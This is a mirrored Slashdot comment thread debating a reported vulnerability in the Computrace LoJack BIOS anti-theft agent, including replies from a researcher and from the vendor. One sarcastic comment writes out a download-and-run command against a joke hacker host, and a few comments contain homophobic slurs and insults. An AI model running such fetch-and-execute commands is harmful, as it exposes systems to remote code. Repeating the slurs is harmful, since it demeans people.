Slashdot Mirror
BIOS "Rootkit" Preloaded In 60% of New Laptops
Keldrin_1 writes "Researchers Alfredo Ortega and Anibal Sacco, from Core Security Technologies, have discovered a vulnerability in the 'Computrace LoJack for Laptops' software. This is a BIOS-level application that calls home for instructions in case the laptop is ever lost or stolen. However, what the application considers 'home' is subject to change. This allows the creation of malware capable of 'infecting the BIOS with persistent code that survive reboots and reflashing attempts.' Computers from Dell, Lenovo, HP, Toshiba, Asus, and others may be affected."
P.C. Phone Home.
Sounds like it's right up Sony's alley.
"You can't really dust for vomit" --Nigel Tufnel
60% seems awfully high for a program I've never heard of. Not that I've been laptop shopping lately, but still.
Can someone with some knowledge please explain to me why we can't build a machine with simple boot code that does not EVER need to be modified for the life of the hardware?
"I'm just here to regulate funkiness."
LoJack swiftly changes to HiJack with a good splash of water
Libera te ex Inferis!
Seriously, why did I get a Gateway in the first place?
Just like SPTD is not a rootkit when it hides my emulated dvd from copy protection software.
This is a popular piece of software that happens to have a potentially serious bug that the vendors and users should be demanding be fixed, but it doesn't make it a rootkit.
Macbooks will give you teh gay, which I guess is not a problem if you already smoke teh cock.
I know it's hard to believe. When doing our research (I'm Alfredo, hi!) we couldn't find a notebook *without* the Computrace agent. It's bad.
Cmon, it's a rootkit BY DESIGN, so it can't be wiped off the laptop easily.
Sheesh.
Someone should do a car analogy for this...
Sent from your iPad.
I was just thinking the same thing. Considering that the list of models with this stuff in the BIOS doesn't include Acer, who ship more laptops than anyone else, or HP, or several other big players, I'm a bit sceptical of that figure. Still the list is quite extensive, I'm a bit surprised I haven't heard of this.
Oh no... it's the future.
I use a Macbook.
Really? My Macbook has it installed. Not that worried yet.
Recommending changing name to MIOS.
Malicious Input Output System.
Ok, so it does include HP. It's been a long day, and I go home in 3 minutes.
Oh no... it's the future.
"the duo demonstrate methods for infecting the BIOS with persistent code that survive reboots and reflashing attempts"
Where exactly is the code stored, that survives reboots?
http://store.lojackforlaptops.com/store/absolute/DisplayProductDetailsPage/productID.104509100
Congrats, there is a Mac version available as well. PC's and Mac's are all the same parts made by the same slaves chained together. there is a few companies in the world that make a basic computer and then Dell, HP, Apple and others add a few things and brand it for themselves.
Don't people specifically BUY low jack for laptops, or does it come pre installed and you pay to activate it?
It clearly has bugs, but I thought the hard/impossible to remove was considered a feature of the software?
You mad
Any way to tell if your laptop has this "feature"?
And is there any way to disable it?
Just to let you know my position;
I have a dell laptop and every laptop I have had for the last three years has had the Computrace option in the bios. It comes neither active or deactivated once you make a choice its irreversible (the Bios alerts you to it). Once activated no matter if you rebuild the laptop it will reapply the 'Feature', what is alarming is that the feature as of late is Geolocation aware in some incarnations. I would like the option to have a BIOS patch remove the feature for good as it appears that it may be compromised.
It also doesnt seem to be too hard to circumvent for the professional thief who may just use Dells service tools to change the asset tag.
I use a Macbook.
As do I, but that does not mean that I have any delusions as it relates to security.
There are quite a bits of exploitable code available that, if properly engineered, can do quite a bit of damage to an Apple computer. Simply because there is no Mac version of the "Melissa" virus does not mean that as a Mac user I should assume that there will never be one.
And let's not forget the iLife torrent that had something special added to it. There are plenty of individuals attempting to prove to the general public that a Mac is no more secure than it's Windows counterpart, and it will be not a false sense of security, but a lack of personal responsibility that will assist in that.
Opinion, obviously. Results may vary.
Those who believe the Internet is private,
find their privates are on the Internet.
1. How can I determine if a laptop has this?
2. Are their any workarounds? Fixes? Can it/Should it be disabled?
Lou
So, the idea was to load "sleeper" software by default on all these machines? Is the URL associated with this "service" always at the same memory location? It shouldn't be that hard for a Malware author to check for this BIOS and try to change the address. Who feels like being monitored by criminals? 10% off sale price?
The pair recommended a digital signature scheme to authenticate the call-home process.
How's that going to help? If you can replace the IP address then you can replace the certificate and signature too. If you have access to modify the BIOS flash, it's game over.
Moderating "-1, Disagree" is simple censorship. Have the guts to post your opinion.
We're talking about a BIOS rootkit. The BIOS runs directly on the hardware. It doesn't really care what OS you're loading, unless it has some specific reason to.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
From the Lojack compatibility list here is a list of company:
ASUS, Dell Fujitsu, GammaTech, Gateway, GD Itronix, Getac, HP, Lenovo,,Motion, Panasonic, Toshiba
You can find a list of models on the "bios compatibility list"
Please tell me if I'm missing something, but isn't the real vulnerability that the BIOS can be modified with unsigned code? A BIOS that allows this can be infected with a rootkit regardless of whether the LoJack code was there.
I'm surprised that hardware manufacturers haven't made better use of persistant on-chip data. A huge opportunity exists for device firmware developers to embed advertising. Imagine installing a Sony DVD drive that detects non-proprietary discs and popups a suggestion to purchase Sony discs. It isn't too hard to imagine Sony including a special bit string on their blank DVDs that their players look for each time a disc is inserted. Or several advertising partners with products that, when present, can create an "advertising opportunity": Sony DVD, Intel cpu, Microsoft OS and D-Link router trigger a cross-market moment.
You'll have to load your laptop into BIOS, it's one of the options listed. I set the option to completely disable it. That doesn't mean that someone could somehow modify code to turn it on, and report it to their site.
Go into the BIOS setup, you can choose to activate the feature if you paid for the license, or deactivate a previously activated agent. Choosing disable removes the feature completely. it can NEVER come back. TFA is hype. If it is never enabled in the bios NOTHING is installed on windows.
Good thing this doesn't come on the cheap models, I bought a cheap-as dirt ($300 new, not a netbook) Toshiba laptop that is a L305-S5955 and thankfully it doesn't have this "feature" but I feel like I dodged a bullet with this one.
Taxation is legalized theft, no more, no less.
We're talking about a BIOS rootkit. The BIOS runs directly on the hardware. It doesn't really care what OS you're loading, unless it has some specific reason to.
Uh, yeah, we are talking about a BIOS feature that some companies choose to install. Macs do not come with a BIOS but rather use EFI. Have you heard of Google?
Apple would have to deliberately include an EFI compatible version of this feature in order for this to be applicable.
Jesus was a compassionate social conservative who called individuals to sin no more.
Why can't computer manufacturers just sell clean working laptops with clean Windows installs plus drivers on a basic BIOS that just includes a few items like which drive to boot from and a hard drive corruption check? It's getting a little bit ridiculous. There are several dozen crapware programs on most mass-market laptops, then you've got the root-kit BIOS, apparently, and the trusted computing module (And to this day no one has really been able to adequately explain to me what features the TCM gives me despite it's ubiquity). I know laptops are getting cheaper, but they are also getting more and more aggravating in some ways.
This BIOS issue is more annoying than the crapware thing, really, because at least crapware can be removed in the control panel (Well, usually, I've seen a program or two refuse to uninstall) or through my computer, but a BIOS flashing is beyond most people's level of technical expertise. It's not anything else technological these days, it seems like, from software to hardware, we're told what we want and then "given" it and have no say in the matter, even if we like the old way better.
Computrace comes loaded in the bios of all of my Dell Latitudes. It is "inactive" until you turn it on in the BIOS. Once activated, there is no way to disable it.
There is a one time license fee to register the Computrace machine on their website. It uses IP based location. Windows will recognize the computrace hardware and install a "Generic USB HUB" driver for it (thanks MS). It must also interface with WMI in some way, as the website will also pull up some details on the computer's specs.
Once you flag the machine as stolen, Computrace (the company) tries to track it down. If they are unable to return your laptop within a certain amount of time (30 days I believe) they pay out 70% of the value of the laptop.
So? EFI = not-so-basic basic input/output system.
There's a mac version of LoJack. Whether or not it is installed on a Macbook would depend on whether Apple chose to preload it, I suppose. A hackintosh, OTOH, might be more likely to have it.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
Its even easier to add this feature to EFI than it is to BIOS since EFI was designed to be Extensible.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
It is indeed hard to believe. As far as I've been able to tell, even in the laptops where it ships, it defaults to disabled. You must actively enable it in the BIOS for it to do anything at all. And it is certainly easily possible to get laptops without it - I just did from HP, two different ones.
Flame bait, I just call it attracting the "homosexual Mac crowd"
"Congrats, there is a Mac version available as well."
The Mac version appears to be software install only, not the BIOS-resident version. Apple is not listed as a partner on the web site.
A.
...bringing you cynical quips since 1998
Disable only works if the product was never activated. if the BIOS is set to active, AND the client software on the machine contacts the servers for Computrace, and verifies it should be licensed, then it "flips a switch" in that BIOS setting, and you can NEVER disable it again.
They need to write to the software, or else the software will always try to contact them, and then anyone could track any laptop with a supeana, ruining their business model.. Instead, it has to be "turned on".
Also, this software in the BIOS does not actually contact anyone directly. All the BIOS level crap does is forcibly try to re-install the agent software under windows. This could get ugly, if you update the BIOS, to try to force it to install a different program every time someone reloads windows...
Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated...
What are we going to do tonight Brain?
Are you saying that this is a BIOS-level process that only introduces a Windows vulnerability? So Linux users and Hackintoshers are safe?
Some get money for putting crapware on their systems. However, the one thing I hate more are the annoying OEM branded programs. Ok, sure, I want a CD burner that can burn ISOs, however I don't want a TOSHIBA (R) DISK BURNER, even though its a decent disk burning program, I hate OEM branded stuff, I buy a computer, I'm smart enough to know theres very little difference between this Toshiba and a similarly equipped Compaq. The OEM branded wallpapers also annoy me, yes, I know what computer I bought. It says so everywhere on the machine, it doesn't matter. I don't need OEM wallpapers.
But, that is what happens when you get a system designed by a marketing department...
Taxation is legalized theft, no more, no less.
First off, the 'feature' comes on a lot of laptops. Doesn't mean its enabled. You have to request it to be enabled in order for it to come from factory with it actually turned on.
If you don't turn it on, it doesn't do anything, no phone home, no remote wipe, no tracking.
Guess what, same thing applies to Blackberrys, and iPhones, and cars with LoJack that have remote shutoff. For every feature there is a potential risk, thats the way the world works.
If you want the potential to remotely locate/track and wipe a laptop or PC, then you also get the potential that someone else can do it as well.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
Since most laptops come with Windows, and, well, you get my drift...
oh, that's right, those aren't BIOS rootkits, nevermind. Makes all the difference.
Though I don't much care if my nachine is compromised in pre-execution or later. All the same crap to me.
I wonder if the bad guys have bothered to monitor LoJack transmissions for cars. At least you'd know where the cops are, and could plan to be elsewhere...
deleting the extra space after periods so i can stay relevant, yeah.
When doing our research we couldn't find a notebook *without* the Computrace agent.
You didn't look very hard then, did you? Acer don't have CompuTrace and finding one of their notebooks is hardly challenging. According to the most recent data from NPD's DisplaySearch, Acer has the second largest unit-volume market share, with 16% of the global notebook shipments (excluding netbooks) to themselves.
Obviously you know that, because as the ZDNet article based on your presentation stated, fully 40% of all new notebooks don't include Computrace. With nearly half of notebooks not including the technology, it's obviously pretty darned easy to find a notebook without Computrace. Polemic statements like that still don't do your credibility any good, though.
PC's and Mac's
The apostrophe is not used for pluralization. You meant "PCs and Macs."
together. there
You are missing capitalization on the first letter of a new sentence.
there is a few companies
Since "companies" is plural, you need to say "there are a few companies."
They do. Its not enabled from the factory. You have to pay extra to get it to actually work. It is completely hidden to the OS unless enabled in the BIOS at boot time.
I realize you just read some FUD kdawson forwarded for us, but you have to take extra steps to make this software work. Out of the box there is nothing to do, you don't have to 'remove it', when the BIOS transfers control it is for all intents and purposes not available.
It is an optional feature, like traction control on your car or overdrive, you just turn it off.
If you don't want it enabled the solution is REAL simple, don't buy a laptop with computrace installed. There are plenty out there without it.
To use a car analogy, can you go to a dealership and buy a car without an engine? No. But you can find a car without air conditioning, if you put a little effort into it (depending on where you live, air conditioning may be an option rather than standard so bear with the analogy).
When you buy mass market cookie cutter products in order to get a lower price than you don't get to specify the exact specifications yourself, you take one of the options you are given as you have to choose what most people want.
If you want to pick anything you want then you have to build it yourself, which is FAR more expensive.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
They have every DV/TC-model of HP Laptop listed - I used to specifically work on all DV/TC/NC/NX models, I've NEVER ONCE seen this in BIOS during any of my repairs. NEVER. Also, this software was never listed in part of HP's troubleshooting guides, and that usually means that feature is not there.
I rebooted my laptop (DV9000, full featured loaded with every possible thing offered) and this 'rootkit' in BIOS is nowhere to be found, at all. Not on my friend's DV2000. Not on the new TC4400 I have in my art room.
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
Yea, but sony does sell the "Computrace LoJack for Laptops" for their notebooks in their Sony branded VIP Protection Suite (which include Norton NIS, Online backup and Computrace LoJack for Laptops).... But i guess in this case, you can optionally chose for this Sony RootKit.... lol
EFI
Learn to macfag
Successful Slashdot troll is, err, successful.
Anyone who thinks that the Darwin-BSD codebase and XNU kernel are as prone to exploitation as Windows kernelspace is dreaming. For one thing Darwin-XNU is open source, so anyone who likes can peek under the hood and suggest improvements. Now XNU isn't perfect, but the Windows kernel is a train wreck at 35,000 feet.
The problem is that Mac users think their computers are invulnerable to exploits and then don't practice safe hex. But if you think your Windows box is just as safe as your Mac box you're going to get a nasty wakeup call at some point in the near future.
A list of participating manufacturers is right there on the company's web site: http://www.absolute.com/partners/bios-compatibility
My company recently investigated the LoJack system after one of our laptops got stolen. It's impressive technology. The sales rep talked up how "fortunate" they were to get the cooperation of many BIOS implementations from the folks who make BIOSes. I don't think that's fortune at all -- it's a corporate deal. Whatever.
It's common but not all-pervasive. (yet?) I looked for my laptop on the list and didn't find it, though, so it's not exactly all-pervasive. It's intended for corporations and individuals who want it.
While the inclusion of this feature into many BIOSes is kinda creepy, I'm not terribly unsettled by it. It does, however, make me want to pursue the open BIOS initiatives.
*sigh* Isn't there some way we could have a "write-only" jumper that locks the chip from being flashed or modified?
LOLjack
I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
Well, once upon a time, that was the case :
In case of bug you needed either to move the BIOS chip to a separate flasher, or at least use a hardware switch on the motherboard to switch between 5v and 12v to enable BIOS chip flashing.
Nowadays, even Windows applications can write to the BIOS without any peculiar form of control. No switch at all involved.
BIOS rootkits were just bound to happen. What makes it even easier for rootkits, is that 90% of all PC uses the same brands of BIOS and those BIOS are designed in a modular fashion making it easy to add a "rootkit" modules without needing the re-create a whole new BIOS (see example of how to add an embed FreeDOS inside an Award BIOS).
That pretty much stupid : Most motherboard have a couple of bugs fixed during the first couple of months. Then there's mostly no need to reflash the BIOS, except for supporting newer CPUs, etc... which would require opening the case and accessing the motherboard anyway. But for the whole lifetime of the BIOS, it remains completely writeable even from user-space application from within highly insecure OSes.
Hardware "write-protection" switches for BIOSes should be reintroduced. Simple fix for a simple problem.
Instead you can stay sure that the manufacturers and Microsoft are going to require several layers of TPM and similar forms of DRM in BIOS which won't even guaranty that BIOSes would be protected from bugs.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
I have worked with Computrace at one of my previous companies, and I always knew it was total crap.
It doesn't even work as advertised most of the time and defeating it is so simple a 5 year old with some skill could do it.
Power Corrupts,Absolute Power Corrupts Absolutely, leaving one person(group)in charge is absolutely corrupt.
"Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated..."
The Original Vendor (DELL, IBM, etc) has the ability to reset activation state.
Power Corrupts,Absolute Power Corrupts Absolutely, leaving one person(group)in charge is absolutely corrupt.
As the AC troll noted, Macs use EFI, not BIOS. That means that the mac software that the grandparent linked to does not survive a disk wipe or swap. That in turn means that the software running above is running only on the hard disk and not the bios, and is not persistent so you can get rid of it easily once installed by just reformatting (or presumably just deleting the files will do it as well).
I find it ironic that the slashdot moderators have gotten the moderation precisely wrong here. The great-grandparent AC was absolutely right, one solution to this rootkit is to own a mac since they don't use BIOS, they use EFI. But this is modded flamebait, and the misinformed grantparent who linked to the software is modded informative.
Gentlemen! You can't fight in here, this is the war room!
I've had 4 laptops in the past few months, and none of them had any BIOS options resembling anything like that... maybe I just got lucky?
...at least on my Dell.
There's option to enable it permanently, meaning it cannot be disabled again.
So number of affected laptops is far from 60%.
60% may be vulnerable, but it is a bald faced lie to say that 60% are preloaded with a rootkit.
A slashdotter who didn't build his own computer is like a Jedi who didn't build his own lightsaber.
One of our BIOSes is broken, because I can turn my copy off on a whim. Perhaps its because my bios requires an admin password? I donno, but I have no problem disabling it. Perhaps its not really disabled?
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
And if it's enabled, will anything happen under Linux? Is there even a Linux client, so I can consider whether to buy the service?
It's offered really cheaply on a bunch of Dells. The program calls home and reports its IP address when activated after being stolen. I doubt if the police are going to do anything with the report of an IP address on a stolen used computer that might be worth $1000 (probably less). All the cops are going to tell you to do is a) use a cable lock in the future b) don't leave the machine in your (car, house, office, etc.) in plain sight and c) call your insurance company. In most cities, cops don't even investigate stolen cars. The original lojack for cars (identifier beacons) might have been useful in a couple of cases, but lojact for computers is almost a complete waste of money. Better off investing in a) a cable lock, b) computer cover and c) insurance.
... is that it allows for malicious code to be uploaded to the machine and the modifications will survive re-flashing and drive wipings. That is a HUGE glaring vulnerability right there and it might not even matter if you enable or disable the feature, if you use it, or if it is able to be disabled/enabled once set. The article does not mention whether it is necessary for it to be enabled, so lets assume it is not. It is not too much of an imagination stretch to envision malware that is able to upload change to the BIOS from the desktop that include the necessary settings for a successful attack. This is bad. Very bad.
The eternal struggle of good vs. evil begins within one's self.
As I posted above, the mac version resides solely on the hard drive and NOT IN THE EFI, which means that it can be easily removed and does not come back. As another has posted, Apple isn't listed as a partner on the company's site and it is not pre-installed. Therefore, macs are fairly safe from this, even if you have it installed, you just have to remove it from your hard drive.
Gentlemen! You can't fight in here, this is the war room!
Yeah, it's pretty funny that a piece of software that has nothing to do with Microsoft that gets loaded on hardware that Microsoft has nothing to do with by the OEMs themselves through a deal with a completely different company is not mentioned in a Microsoft commercial about Windows. Or actually, it's really not.
The point is that it makes it super easy...all the police have to do is show up. Lojack provides evidence and testifies, if necessary. Police are working with a company they're used to working to.
After all, they care about noise complaints.
That said, I still think a cable lock is a ripoff
posted primarily to undo moderation that /.'s fucking AJAX put in for me.
93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
True, but I'm still wondering how this would affect someone who wanted to built a hackintosh, since the LoJack driver is in the BIOS and it's intentionally difficult to remove. If your computer was originally intended to have XP or Vista, you might have the LoJack driver.
Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
It really don't matter how secure your computer is if you think you're invulnerable and are in the habit of typing
wget http://www.h4x0r.org/pwn.sh ./pwn.sh
chmod a+x pwn.sh
sudo
93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
Actually this could be built into EFI. Apple don't, but if a laptop manufacturer wanted to they could. It's even easier than BIOS - an EFI ROM is a structured filesystem containing all the drivers and commands required to boot.. things like the display and keyboard drivers. Adding this software could be done after the fact without even having to touch the original code.
At least on Dell laptops, there is a method of disabling CompuTrace after activating (or re-enabling it once "disabled permanently") by erasing the contents of a certain EEPROM chip...
> This is a BIOS-level application that calls home for instructions in
> case the laptop is ever lost or stolen. However, what the application
> considers 'home' is subject to change.
Reminds me of an old cartoon where two people are standing right outside a bank's new, mighty vault. One's pointing at 3 foot hole in the wall with a plug lying on the floor, "...and that's the escape hatch in case someone gets locked in."
(-1: Post disagrees with my already-settled worldview) is not a valid mod option.
[Citation Needed] There has yet to be a single complaint about Apple's employee work conditions, even for contractors.
Grammar Nazi's does add's a lot of value to the conversation's.
The article isn't really clear how the malicious code would be initially installed.
Does the user have to run an executable that flashes the BIOS? Do you need root access?
Please explain to me how this works.
This BIOS 'switch' - how exactly is that flipped? CMOS is not permanent, NVRAM is not permanent, RAM is not permanent. The only permanent storage are removable devices such as hard drives, and the BIOS itself. The BIOS is usually protected physically (jumper) and isn't a 'volatile' storage means anyways. Also, from my understanding, this isn't something that can be reprogrammed on the fly - it has to be done in "real mode" and is done on a block level, rather than bit level (just like programming any other chip).
I just either lack the magic clue that tells me how this is possible, or this isn't possible at all.
For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
You're not missing any clues; it's just impossible.
My Dell Inspiron 6000's last BIOS update (several years ago) came with some Computrace back-end stuff, with the aforementioned options for on, off, and disable. On and disable are both "permanent" options.
Which is really interesting, if you follow the timeline: The feature wasn't wasn't there at all to begin with. And then, I flashed it in. And now, it says its permanent. Uh - yeah, right.
If I set it to "on" or "disable", it'll just flip a bit somewhere, and/or do some magic crypto, and flash that result into a region of BIOS.
But, it's still all just flash. It can still be erased, and then it can be rewritten. The BIOS might not support doing this on its own (for reasons which might range from management to marketing), but that doesn't mean that it's something that cannot be accomplished with other tools.
Kid-proof tablet..
So if this is on the bios and works with an installed program on the machine, isn't it feasible to pull the HDD and replace it?
As for the bios, like was said, it may get ugly.
If it's active, there is probably some way to shut it off...
I got my dell about 8 months back. The sound didn't work at first and i went to the bios and saw some option that allows for the laptop to be tracked. I guess this is it. Is the laptop still vulnerable even if this feature is turned off? Mine came with it turned off as default. Maybe you gotta pay extra for it, i dunno.
Including Windows means the laptop is not clean.
If someone is passing you on the right, you are an asshole for driving in the wrong lane.
So you're here for a date then?
Perhaps they have some form of WORM memory? However, given the example of a machine that never had the feature until a BIOS update, I'm guessing it's just tucked away somewhere in the regular BIOS memory.
And then, I flashed it in. And now, it says its permanent. Uh - yeah, right.
If I set it to "on" or "disable", it'll just flip a bit somewhere, and/or do some magic crypto, and flash that result into a region of BIOS.
Of course you could disable it. But that's not the point.
There seems to be a prevalent view on /. that because a security system can be disabled, it always will be and is therefore pointless. But anyone who's got enough knowledge to know about the existence of this is probably not a junkie that steals laptops left alone for a minute on the train. And that's what the great majority of petty theft is.
Well no shit there. I think what everyone is trying to say and yet the mods choose to ignore is "yes Virginia, Mac hardware are for the most part immune from this because:
They use EFI
EFI is not supported and the Mac version runs from the HD and can easily removed
Macs are not listed as a partner on the site.
"Of course, I wonder what happens if I buy an "off lease" laptop, that was at one point activated..."
Don't run Windows, excepting virtual instances.
"This post is an artistic work of fiction and falsehood. Only a fool would take anything posted here as fact."
Yup, just like Daemon tools (or at least the part that does the actual emulation) is very rootkit-like technically, as long as it does what the user wants it isn't a rootkit. Although it must be said that if the software (due to a bug or something) ends up in a state where it doesn't do what the legitimate user wants and doesn't allow him to remove it, it can become a rootkit and that is something that software developers should try to avoid. Perhaps splitting the software in two parts, one that can only remove the software under proper authentication and the other to do the actual work that is designed in such a way that whatever happens to it it can never overwrite the first part, would help.
Go into the BIOS setup, you can choose to activate the feature if you paid for the license, or deactivate a previously activated agent. Choosing disable removes the feature completely. it can NEVER come back. TFA is hype. If it is never enabled in the bios NOTHING is installed on windows.
So, if I want to steal a laptop and I'm afraid of this Lojack thing, all I have to do is simply disable it in the BIOS and the laptop will never phone home? Doesn't this kind of defeat the purpose of Lojack in the first place?
If I can be modded down for being a troll, can I be modded up for being an orc, or a balrog?
The title is VERY MISLEADING.
I've got a few Dell laptops that are friggin ancient in my book (aka single core) and they have computrace settings in the bios.
Get into your bios and disable it, if you have no intention of using it.
Sos groso, sabelo.
I imagine it's a fuse/bit. You have to be able to prevent the laptopknapper from disabling or flashing your BIOS in order for it to be an effective security measure.
Actually, if you decompile the DSDT of many machines you will see that they do indeed detect what OS is running and act accordingly. This is the cause of a lot Linux problems because BIOS vendors will special case something for, say, XP that isn't needed in Vista but is needed in Linux. As the machine has been identified as running Linux and not XP, that special code isn't run. The Linux kernel even has boot options to allow you to identify to the BIOS that you are running a different OS for this very reason.
Computrace (R)
Disable - Deactivate - Activate
This field lets you Activate or Disable the BIOS module interface of the optional Computrace (R) Service from Absolute(R) Software. The Computrace agent from Absolute Software is a service solution designed to help track assets and provide recovery services in the event the notebook is lost of stolen. The Computrace agent communicates with the Absolute Software Monitoring Server at programmed intervals to provide the tracking service. By activating the service, you consent to the transmission of information from and to your computer and the Absolute Software Monitoring Server. The Computrace service is purchased as a separate option and the monitoring Server will enable its agent security module through an interface provided by the BIOS. The Computrace tracking agent can only be used in the US, UK, Canada and Australia. Computrace(R) and Absolute(R) are registered trademarks of Absolute Software Corporation.
Disable = Permanently block the Computrace module interface.
Deactivate = Block the Computrace module interface (Default).
Activate = Permit the Computrace module interface.
The Absolute Anti-Theft solution is Disabled. You cannot change the setting.
# tpm module killall: blacklist tpm_infineon blacklist tpm blacklist tpm_bios
It loads up to communicate using the tpm i should know i just spent mths trying to find why my box was bouncing packets of a particular ip .. so under linux you just blacklist the 3 tpm modules .....
so you think it all takes place at bios level?? thats bs
This is a very bad thing. A "security" product should not allow downloading of software. This is even worse. It allows hidden downloading of software not visible to the user.
Supposedly it's delivered "turned off"? But how do you know it's turned off at startup? How do you know it wasn't turned on during operating system loading, or wasn't turned on by any of the preloaded crap that the "major PC manufacturers" preload? How do you know there isn't some way to turn it on remotely?
No computer with this software in ROM should be used for proprietary material, legal documents, medical records regulated by the HIPPA, financial records regulated by the SEC, or anything else that might attract an opponent. If you just play WoW, go ahead.
Ever hear of a fusible link? It's conceivable that a small fuse is blown upon activation, and then the connection that fuse made is tested to see if it should be active. Write-Once, Read-Many (WORM) memory.
ERROR: SIG NOT FOUND (A)bort, (R)etry, (F)ail?:
Well, I did - but I didn't apply it to BIOS. (I only know of them in the context of microcontrollers)
For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
No, I don't think I can disable it. I can only issue an instruction to a computer which is described as disabling the function permanently, but that doesn't exactly mean anything important.
Here's the scenario:
I "disable" it, the appropriate bits are written into the flash ROM on the motherboard, and it appears to be disabled.
Later, something else comes along, and writes different bits into the flash ROM. And then it's not disabled anymore.
(And, whatever the case, the default is "off," which should at least forestall any white hat usage of the thing without user intervention. Emphasis on "should" and "white hat". It's Really Fucking Important to maintain a certain level of mistrust when it comes to considering such matters.)
And, whatever the case: I don't think it even matters at that point. The thing still needs some software support in order to work, and the package which includes that software can fairly easily modify the BIOS to include whatever small bit of code the programmer decides should be there.
There's well-documented, reliable, and easy methods for inserting your own code into BIOS to initialize a SCSI card, perform a network boot, or change the Energy Star logo, and there's no reason at all why these same methods cannot be used purposes other than those I just listed -- including, of course, quietly inserting malicious backdoors.
Kid-proof tablet..
Ok, so: Blow the fuse upon either activating or disabling it.
And then, something else comes along and changes the code that looks for the status of that fuse.
Ever hear of a video game crack? This sounds trivial, by comparison.
Kid-proof tablet..
So, bottom line - I don't imagine people owning Vaios long enough for them to be too problematic. They'll be in the shop being repaired every six months!
My vaio desktop is 10 years old; A solid computer and still used regularly. Did the VAIO brand go to shit while I was under a rock?
TCM has roots in a paper called "Programming Satan's computer" the first paragraph of the conclusion is this ...
We have tried to give an accessible introduction to the complex and fascinating
world of cryptographic protocols. Trying to program a computer which is under
the control of an intelligent and malicious opponent is one of the most challenging
tasks in computer science, and even programs of a few lines have turned out to
contain errors which were not discovered for over a decade.
The second sentence tells you what TPM is for; hint: it's not for you.
They don't complaint because they suicide.
<quote>
Foxconn just increased the compensation for their worker that killed himself as a result of possible beatings and interrogations over a lost iPhone.
The family now gets $52,600 (up from $44,000) as well as $4,385 every year as long as one of the parents are alive. The Foxconn official that leaked this information to the press spoke anonymously since he wasn't a qualified press-relations employee. [Yahoo]
</quote>
http://gizmodo.com/5324967/foxconn-increases-compensation-for-iphone-suicide-employees-family
lrn2macfag
Please read the paper. The configuration is saved in NVRAM and there are many ways to reverse it. We even found a software-only way.
Never say never.
I work for Absolute Software. Absolute reviewed the research paper, and the claims that there's a vulnerability in Computrace or Computrace LoJack for Laptops BIOS module are without merit and systems are secure:
- The Computrace BIOS module does not allow a special undetected path into the operating system. It is not a rootkit.
- In order for the Computrace BIOS module to work, it is activated by the end-user customer, not the computer manufacturer, upon receipt of the computer and activation of Absolute Software's products.
- The Computrace BIOS code alleged in the article to have this vulnerability is old code that was not officially released into a BIOS and, to Absolute's knowledge, has never been active in the BIOS of any computer.
- If a malicious attacker were able to alter the BIOS code, any popular anti-virus software would alert the customer.
- The Computrace BIOS module currently on the market is not susceptible to the risks claimed in the article and therefore none of our customers are at risk for this specific type of attack.
Absolute has issued a statement to the public, refuting these claims and explaining their position at length here: http://www.absolute.com/company/pressroom/news/2009/07/refutes_claim
Absolute refutes the claims of BIOS vulnerability:
http://www.absolute.com/company/pressroom/news/2009/07/refutes_claim
I have 4 laptops (2 Dell, 1 Compaq, 1 HP). They've been purchased at various times over the last 6 years, and not one of them has the option to enable this. The Dells are model M50 and M70 (business laptops), the HP is an 8530w (also a business laptop), and the Compaq is some random shitty home model I can't recall right now. Not one of them has an option to enable or disable this in the bios, and the older Dell and Compaq don't even have a TPM module. 60% just seems like a bullshit number to me. Maybe they meant 6%?
(yes I know anecdotal != fact)
Google is your friend,
http://www.absolute.com/company/pressroom/news/2009/06/Absolute-Acer-IntelAT
Acer also have computrace, in fact it has the newer version, probably more secure. In fact, some Sony models also have it. Look for "ABSOLUTE" in a dmidecode dump. I think that most Netbooks don't have it, bot we don't have every notebook model to check.
Is disabled, yes. How do you know that? did you read the source? it's closed. If you want to have software that can remotely erase or read your data in your notebook, is up to you to trust Intel or Absolute.
Disabling it in the BIOS don't work.
Don't miss interpret us, they have a useful product. But it must be a little more secure, and *optional*.
All those MS commercials mention the computer brands by name, and all of those brands include this.
If Microsoft is going to bundle their OEMs' brand names into their ads, they have to accept that the mistakes of those OEMs reflect on their advertisements.
It doesn't hurt to be nice.